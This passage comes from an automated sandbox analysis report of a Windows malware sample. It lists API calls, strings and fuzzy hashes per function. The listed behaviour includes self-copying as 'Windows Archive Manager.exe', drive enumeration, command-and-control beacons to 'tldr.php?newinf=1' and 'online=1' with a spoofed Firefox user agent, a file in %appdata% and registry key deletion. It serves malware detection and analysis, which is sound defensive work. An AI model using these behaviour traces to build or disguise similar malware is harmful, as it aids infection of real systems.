                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5991C271508340EFDB218F65DD48BABBBF6FB88740F10892DFA9982260CB719854DF56
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • memset.MSVCRT ref: 004035FB
                                                                                                                                                                                                                          • memset.MSVCRT ref: 00403611
                                                                                                                                                                                                                          • memset.MSVCRT ref: 00403627
                                                                                                                                                                                                                          • memset.MSVCRT ref: 0040363B
                                                                                                                                                                                                                          • GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 00403651
                                                                                                                                                                                                                          • ExpandEnvironmentStringsW.KERNEL32(%temp%,?,00000208), ref: 00403668
                                                                                                                                                                                                                          • GetLogicalDriveStringsW.KERNEL32(000000D0,?), ref: 0040367A
                                                                                                                                                                                                                          • GetTickCount.KERNEL32 ref: 00403680
                                                                                                                                                                                                                          • srand.MSVCRT ref: 00403687
                                                                                                                                                                                                                          • _snwprintf.MSVCRT ref: 004036A3
                                                                                                                                                                                                                          • CopyFileW.KERNEL32(?,00408260,00000000), ref: 004036B9
                                                                                                                                                                                                                          • SetFileAttributesW.KERNEL32(00408260,00000080), ref: 004036CD
                                                                                                                                                                                                                          • GetDriveTypeW.KERNEL32(?), ref: 004036F2
                                                                                                                                                                                                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 00403711
                                                                                                                                                                                                                          • ExitThread.KERNEL32 ref: 00403734
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.2428787049.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428765288.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428823607.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_LisectAVT_2403002B_290.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: memset$File$DriveStrings$AttributesCopyCountCurrentDirectoryEnvironmentExitExpandLogicalModuleNameThreadTickType_snwprintfsrand
                                                                                                                                                                                                                          • String ID: %ls\Windows Archive Manager.exe$%temp%
                                                                                                                                                                                                                          • API String ID: 1005768253-3630328173
                                                                                                                                                                                                                          • Opcode ID: 40a7cf7f1805e51efa996ffe9d7b8850cb8bf2961425a96cb5c0fae36d6510fc
                                                                                                                                                                                                                          • Instruction ID: d69677a716828d0fd0f9714df326e3bc7eebc1e83e94ac9ad288232d9b6456d4
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 40a7cf7f1805e51efa996ffe9d7b8850cb8bf2961425a96cb5c0fae36d6510fc
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F1318AF1A407086BDB609B60DC4AF9F376CEB00701F1044B6F648F61D2DA789A848F68
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • RtlEnterCriticalSection.NTDLL(0044B340), ref: 00423381
                                                                                                                                                                                                                          • RegisterClipboardFormatA.USER32(0043AB60), ref: 0042338C
                                                                                                                                                                                                                          • RegisterClipboardFormatA.USER32(0043AB70), ref: 0042339C
                                                                                                                                                                                                                          • GetClassInfoExA.USER32(0043ACBC,00000030), ref: 004233BF
                                                                                                                                                                                                                          • LoadCursorA.USER32(00000000,00007F00), ref: 00423402
                                                                                                                                                                                                                          • RegisterClassExA.USER32(00000030), ref: 00423425
                                                                                                                                                                                                                          • __recalloc.LIBCMT ref: 00423479
                                                                                                                                                                                                                          • GetClassInfoExA.USER32(0043ACC8,00000030), ref: 004234D9
                                                                                                                                                                                                                          • LoadCursorA.USER32(00000000,00007F00), ref: 0042351E
                                                                                                                                                                                                                          • RegisterClassExA.USER32(00000030), ref: 00423541
                                                                                                                                                                                                                          • __recalloc.LIBCMT ref: 00423587
                                                                                                                                                                                                                          • RtlLeaveCriticalSection.NTDLL(0044B340), ref: 004235C9
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.2428844396.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_40b000_LisectAVT_2403002B_290.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ClassRegister$ClipboardCriticalCursorFormatInfoLoadSection__recalloc$EnterLeave
                                                                                                                                                                                                                          • String ID: 0
                                                                                                                                                                                                                          • API String ID: 664480883-4108050209
                                                                                                                                                                                                                          • Opcode ID: cf02972261f026e4bcbec7c13d29e9c08f259911210233a727ece19897c21767
                                                                                                                                                                                                                          • Instruction ID: 40b37d6fc815d34b22f1382bcbd39b080c0c3bcab1dcc9cb4347d5ed29d7557a
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: cf02972261f026e4bcbec7c13d29e9c08f259911210233a727ece19897c21767
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7D61AFB0A043419BD711CF16E884A1ABBF5FF95715F90452EE89483360E7B8CA85CB8E
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • SelectObject.GDI32(?,?), ref: 0041FF6D
                                                                                                                                                                                                                          • SelectObject.GDI32(?,?), ref: 0041FFB8
                                                                                                                                                                                                                          • DeleteDC.GDI32(00000000), ref: 0041FFD4
                                                                                                                                                                                                                          • InterlockedDecrement.KERNEL32(?), ref: 0041FFFA
                                                                                                                                                                                                                          • InterlockedDecrement.KERNEL32(?), ref: 0042002D
                                                                                                                                                                                                                          • SelectObject.GDI32(?,?), ref: 00420065
                                                                                                                                                                                                                          • SetRectEmpty.USER32(?), ref: 00420084
                                                                                                                                                                                                                          • DrawTextA.USER32(?,?,000000FF,?,00000424), ref: 004200B0
                                                                                                                                                                                                                          • SelectObject.GDI32(?,00000000), ref: 004200BB
                                                                                                                                                                                                                          • InterlockedDecrement.KERNEL32(?), ref: 004200EC
                                                                                                                                                                                                                          • SelectObject.GDI32(?,?), ref: 00420124
                                                                                                                                                                                                                          • SetRectEmpty.USER32(?), ref: 00420143
                                                                                                                                                                                                                          • DrawTextA.USER32(?,?,000000FF,?,00000610), ref: 0042016F
                                                                                                                                                                                                                          • SelectObject.GDI32(?,00000000), ref: 0042017A
                                                                                                                                                                                                                          • InterlockedDecrement.KERNEL32(?), ref: 004201AB
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.2428844396.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_40b000_LisectAVT_2403002B_290.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ObjectSelect$DecrementInterlocked$DrawEmptyRectText$Delete
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1261204413-0
                                                                                                                                                                                                                          • Opcode ID: 45ebfb616250f77b699904baf38d30cdf4aff1f93c6dffa9c54199414b70fd65
                                                                                                                                                                                                                          • Instruction ID: 0d3b065532d34c83c141dc093bc01bf73ec72bfda3dbf1df21a0141086e03954
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 45ebfb616250f77b699904baf38d30cdf4aff1f93c6dffa9c54199414b70fd65
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9CB19B71604304EFDB00CF64E888A6ABBF5FF88304F448A6AF9498B221D775DD55CB5A
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetClipBox.GDI32(?,?), ref: 004212DA
                                                                                                                                                                                                                          • SetBkColor.GDI32(?,00000001), ref: 0042132A
                                                                                                                                                                                                                          • SetBkColor.GDI32(?,?), ref: 0042133F
                                                                                                                                                                                                                          • ExtTextOutA.GDI32(?,00000000,00000000,00000002,?,00000000,00000000,00000000), ref: 0042135B
                                                                                                                                                                                                                          • SetBkColor.GDI32(?,00000000), ref: 00421367
                                                                                                                                                                                                                          • DrawEdge.USER32(?,?,00000008,00004009), ref: 00421385
                                                                                                                                                                                                                          • OffsetRect.USER32(00000010,00000003,?), ref: 004213CD
                                                                                                                                                                                                                          • DrawFrameControl.USER32(?,00000004,00000004,?), ref: 004213F0
                                                                                                                                                                                                                          • CopyRect.USER32(?,?), ref: 00421461
                                                                                                                                                                                                                          • SetTextColor.GDI32(?,?), ref: 004214CC
                                                                                                                                                                                                                          • DrawTextA.USER32(?,?,000000FF,?,00000010), ref: 0042154A
                                                                                                                                                                                                                          • SetTextColor.GDI32(?,?), ref: 00421567
                                                                                                                                                                                                                          • SetTextColor.GDI32(?,00000000), ref: 004215F2
                                                                                                                                                                                                                          • DrawFocusRect.USER32(?,?), ref: 0042160D
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.2428844396.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_40b000_LisectAVT_2403002B_290.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Color$Text$Draw$Rect$ClipControlCopyEdgeFocusFrameOffset
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2048994688-0
                                                                                                                                                                                                                          • Opcode ID: 200927e29ddfe15c49f7e4c72c99c9c384ca24b6296100b23b26864b53e959f2
                                                                                                                                                                                                                          • Instruction ID: d2e7032c405a87bda436ebbee9352e43b21f8cfe9bd8d6afaaa75e2085407c70
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 200927e29ddfe15c49f7e4c72c99c9c384ca24b6296100b23b26864b53e959f2
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8CC12775604205DFDB04CF18D884A6ABBF6FF88310F588A69F8898B3A5D770ED44CB55
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • memset.MSVCRT ref: 00401CF1
                                                                                                                                                                                                                          • _snprintf.MSVCRT ref: 00401D15
                                                                                                                                                                                                                          • _snprintf.MSVCRT ref: 00401D39
                                                                                                                                                                                                                          • InternetOpenA.WININET(Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0,00000000,00000000,00000000,00000000), ref: 00401D4E
                                                                                                                                                                                                                          • InternetOpenUrlA.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 00401D78
                                                                                                                                                                                                                          • Sleep.KERNEL32(000003E8), ref: 00401D86
                                                                                                                                                                                                                          • InternetCloseHandle.WININET(00000001), ref: 00401D8F
                                                                                                                                                                                                                          • InternetCloseHandle.WININET(00000000), ref: 00401D9B
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          • %stldr.php?newinf=1, xrefs: 00401D04
                                                                                                                                                                                                                          • %stldr.php?online=1, xrefs: 00401D28
                                                                                                                                                                                                                          • Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0, xrefs: 00401D49
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.2428787049.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428765288.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428823607.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_LisectAVT_2403002B_290.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Internet$CloseHandleOpen_snprintf$Sleepmemset
                                                                                                                                                                                                                          • String ID: %stldr.php?newinf=1$%stldr.php?online=1$Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0
                                                                                                                                                                                                                          • API String ID: 3400190714-2874531546
                                                                                                                                                                                                                          • Opcode ID: 88955e9700e802a41a336eaddde6b3c6a87df646c806fd4a3ba7a8a57b138e3a
                                                                                                                                                                                                                          • Instruction ID: 172d5a9b1eb5bcf93a70bdf7b9922c54f139c7de0db3159d92bce3780515f997
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 88955e9700e802a41a336eaddde6b3c6a87df646c806fd4a3ba7a8a57b138e3a
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9711A7B0E4031CBBEF11ABA0CD47FDA3A78AB04B04F1444B6B754B91E1D6B49A94CF59
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.2428787049.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428765288.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428823607.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_LisectAVT_2403002B_290.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Sleep$_snprintfmemset$CreateThread
                                                                                                                                                                                                                          • String ID: %s%s$x
                                                                                                                                                                                                                          • API String ID: 3185671098-918306452
                                                                                                                                                                                                                          • Opcode ID: 3223238570f32b9aa77b3ec0efea89e6ebf1555110f4e8c578895ea75ee811a0
                                                                                                                                                                                                                          • Instruction ID: 53edad24388d98d4bc92df8c35b0c357ffc742b0aeb58214580d6d560269df2a
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3223238570f32b9aa77b3ec0efea89e6ebf1555110f4e8c578895ea75ee811a0
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3C2183B1A40298AFDB109B91ED46FD97278AB05700F4004B6F249F60C1D7B85AD4CF19
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.2428787049.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428765288.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428823607.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_LisectAVT_2403002B_290.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Filememset$AttributesEnvironmentExistsExpandPathStrings_snwprintf_wfopenfclose
                                                                                                                                                                                                                          • String ID: %appdata%$%ls\winsvcs_.txt
                                                                                                                                                                                                                          • API String ID: 1073927619-2399589006
                                                                                                                                                                                                                          • Opcode ID: e84ac5780f314c49fbe05951a747f9916237b8ab93540f80218f68c5d7e039d5
                                                                                                                                                                                                                          • Instruction ID: 1a380fa9675f0f2fc8ef9a6445bbc20ecbefda1fb14ea0c07b927e82b87ac6b4
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e84ac5780f314c49fbe05951a747f9916237b8ab93540f80218f68c5d7e039d5
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 621137B194031C66DF20EB609D0EFDB73BCAB04704F0444B6B354F60D2EAB896C48E59
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • RegOpenKeyExA.ADVAPI32(00136788,?,00000000,?,00135518), ref: 0041A7D0
                                                                                                                                                                                                                          • RegCloseKey.ADVAPI32(?), ref: 0041A7E8
                                                                                                                                                                                                                          • RegEnumKeyExA.ADVAPI32(?,00000000,?,00000100,00000000,00000000,00000000,0013550C), ref: 0041A83B
                                                                                                                                                                                                                          • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000100,00000000,00000000,00000000,0013550C), ref: 0041A881
                                                                                                                                                                                                                          • RegCloseKey.ADVAPI32(?), ref: 0041A89E
                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(0043AC38), ref: 0041A8D1
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,0043AC48), ref: 0041A8E1
                                                                                                                                                                                                                          • RegCloseKey.ADVAPI32(?), ref: 0041A91D
                                                                                                                                                                                                                          • RegCloseKey.ADVAPI32(?), ref: 0041A937
                                                                                                                                                                                                                          • RegDeleteKeyA.ADVAPI32(00136788,?), ref: 0041A956
                                                                                                                                                                                                                          • RegCloseKey.ADVAPI32(?), ref: 0041A96C
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.2428844396.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_40b000_LisectAVT_2403002B_290.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Close$Enum$AddressDeleteHandleModuleOpenProc
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2624191705-0
                                                                                                                                                                                                                          • Opcode ID: 6a43372cc1d27a15c2e45efd9a2df907d32c4fb89c259d33e084236f886f09b6
                                                                                                                                                                                                                          • Instruction ID: 83ba429f44283625fc5b112b12f706557ec537738ca58ebf2211737b90b5b4cc
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6a43372cc1d27a15c2e45efd9a2df907d32c4fb89c259d33e084236f886f09b6
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5C51A375A05348AFD7359F25DC44BEB77F8FB89354F00482AF98882250D7B48D94CBA6
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • CoInitialize.OLE32(00000000), ref: 00401DB1
                                                                                                                                                                                                                          • CoCreateInstance.OLE32(004051FC,00000000,00000001,004051EC,?), ref: 00401DC9
                                                                                                                                                                                                                          • VariantInit.OLEAUT32(?), ref: 00401DE0
                                                                                                                                                                                                                          • VariantInit.OLEAUT32(?), ref: 00401E1B
                                                                                                                                                                                                                          • VariantInit.OLEAUT32(?), ref: 00401E32
                                                                                                                                                                                                                          • Sleep.KERNEL32(000003E8), ref: 00401E71
                                                                                                                                                                                                                          • CoUninitialize.OLE32 ref: 00401E8D
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.2428787049.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428765288.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428823607.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_LisectAVT_2403002B_290.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: InitVariant$CreateInitializeInstanceSleepUninitialize
                                                                                                                                                                                                                          • String ID: p=Dv
                                                                                                                                                                                                                          • API String ID: 4283135408-1270568779
                                                                                                                                                                                                                          • Opcode ID: e1bc4a2e85860f621d4fc2f96366de4be55791a67befecc08ac8998583c24772
                                                                                                                                                                                                                          • Instruction ID: 208c781282a30cfd99823755e06e75eb4e8dd7f2476d9e837450959f1c20ea48
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e1bc4a2e85860f621d4fc2f96366de4be55791a67befecc08ac8998583c24772
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4931D035900608AFDB01DFA8D949BCEBBB9EF0D320F504066E901FB2A0D7B1A9448F64
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(KERNEL32.DLL,004423C0,0000000C,00428325,00000000,00000000), ref: 004281FC
                                                                                                                                                                                                                          • __crt_waiting_on_module_handle.LIBCMT ref: 00428207
                                                                                                                                                                                                                            • Part of subcall function 0042AD25: Sleep.KERNEL32(000003E8,00000000,?,0042814D,KERNEL32.DLL,?,00428199), ref: 0042AD31
                                                                                                                                                                                                                            • Part of subcall function 0042AD25: GetModuleHandleW.KERNEL32(?,?,0042814D,KERNEL32.DLL,?,00428199), ref: 0042AD3A
                                                                                                                                                                                                                          • __lock.LIBCMT ref: 00428262
                                                                                                                                                                                                                          • InterlockedIncrement.KERNEL32(004491E8), ref: 0042826F
                                                                                                                                                                                                                          • __lock.LIBCMT ref: 00428283
                                                                                                                                                                                                                          • ___addlocaleref.LIBCMT ref: 004282A1
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.2428844396.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_40b000_LisectAVT_2403002B_290.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: HandleModule__lock$IncrementInterlockedSleep___addlocaleref__crt_waiting_on_module_handle
                                                                                                                                                                                                                          • String ID: KERNEL32.DLL
                                                                                                                                                                                                                          • API String ID: 4021795732-2576044830
                                                                                                                                                                                                                          • Opcode ID: 87a858832e1983b6c2b45198c842f97ef5da6d3e8eb4c482d3787c8fc6c638f7
                                                                                                                                                                                                                          • Instruction ID: 71b69992fdd27ed05a877e38898eabb59d78cf734761bb36ba796b392924f269
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 87a858832e1983b6c2b45198c842f97ef5da6d3e8eb4c482d3787c8fc6c638f7
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2211D570A41B11DFE710DF36A905B5EBBF0AF04314F50556FE89992390CB789900CB6C
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetWindowLongA.USER32(?,000000FC), ref: 00413821
                                                                                                                                                                                                                          • SetWindowLongA.USER32(?,000000FC,?), ref: 0041382F
                                                                                                                                                                                                                          • IsWindow.USER32(?), ref: 00413862
                                                                                                                                                                                                                          • GetCurrentProcess.KERNEL32 ref: 004138AC
                                                                                                                                                                                                                          • FlushInstructionCache.KERNEL32(00000000,?,0000000D), ref: 004138B6
                                                                                                                                                                                                                          • SetWindowLongA.USER32(?,000000FC,?), ref: 004138C2
                                                                                                                                                                                                                          • GetWindowLongA.USER32(?,000000FC), ref: 0041394F
                                                                                                                                                                                                                          • SetWindowLongA.USER32(?,000000FC,?), ref: 0041395D
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.2428844396.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_40b000_LisectAVT_2403002B_290.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Window$Long$CacheCurrentFlushInstructionProcess
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2416140278-0
                                                                                                                                                                                                                          • Opcode ID: 9cd0c253de24d0da4a258324cbea736e14a8812de488181c82210799ed2210c6
                                                                                                                                                                                                                          • Instruction ID: 53fdc4dda89daccb099a69e9506e87e8d6b252ccccbd8fdd27d7c1450a31b40a
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9cd0c253de24d0da4a258324cbea736e14a8812de488181c82210799ed2210c6
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E451B5702047009BD7305F25DC48B67BBE5FF44715F048A2EF4AA822E1D7B4AE41C718
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.2428844396.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_40b000_LisectAVT_2403002B_290.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: String$Free_memcpy_s
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2083054645-0
                                                                                                                                                                                                                          • Opcode ID: 56663a8811120e9036bf697866b6e5e652b3cf7cb480ee4b7b3da6ff29d398f3
                                                                                                                                                                                                                          • Instruction ID: 1ce8d2cbe3debae867d133ec0a61dd978d441ec293a76d53af323acb72a7b2bb
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 56663a8811120e9036bf697866b6e5e652b3cf7cb480ee4b7b3da6ff29d398f3
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D221F632208601AFE7105F24EC48B5BB7B9FF44724F144C2AF98493261C779DC81CB99
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • _ValidateScopeTableHandlers.LIBCMT ref: 0042B561
                                                                                                                                                                                                                          • __FindPESection.LIBCMT ref: 0042B57B
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.2428844396.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_40b000_LisectAVT_2403002B_290.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FindHandlersScopeSectionTableValidate
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 876702719-0
                                                                                                                                                                                                                          • Opcode ID: 020a3270b3e44db3070e349b28cff66a8442c1fddc848a019d4b1228e148b0af
                                                                                                                                                                                                                          • Instruction ID: c2943d19c9542f00f785555977c3dc5d60b80e9ec805d4403e1c04b136c06cca
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 020a3270b3e44db3070e349b28cff66a8442c1fddc848a019d4b1228e148b0af
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2C91D176B002258BCB14DF59F88076EB3B9EBC5314F95822AD815973A1E739EC01CBD8
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • lstrlen.KERNEL32(00000000,?,?,00000000,00000000,?), ref: 00418F91
                                                                                                                                                                                                                          • lstrlenW.KERNEL32(?,00000000,80070057), ref: 00418FA9
                                                                                                                                                                                                                          • _memcpy_s.LIBCMT ref: 00418FDB
                                                                                                                                                                                                                          • _memcpy_s.LIBCMT ref: 00419018
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.2428844396.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_40b000_LisectAVT_2403002B_290.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: _memcpy_slstrlen
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2392212498-0
                                                                                                                                                                                                                          • Opcode ID: 69d6166470538bd476869948a087b28e718e2119ec8f685af8e8bd280e4ec471
                                                                                                                                                                                                                          • Instruction ID: 48a8b0cc39821948161f5f9393556796c921f6ff3b7309816e02544d4b83d9d4
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 69d6166470538bd476869948a087b28e718e2119ec8f685af8e8bd280e4ec471
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6B3106B16042119FE730AF22EC81A777BA8EB95314F14483EF98582211EA7AEC81C759
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetClientRect.USER32(?,?), ref: 00414EF5
                                                                                                                                                                                                                          • SelectObject.GDI32(00000000,00000000), ref: 00414F37
                                                                                                                                                                                                                          • DeleteObject.GDI32(00000000), ref: 00414F45
                                                                                                                                                                                                                          • FillRect.USER32(?,?,00000006), ref: 00414F63
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.2428844396.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_40b000_LisectAVT_2403002B_290.jbxd
                                                                                                                                                                                                                          Similarity
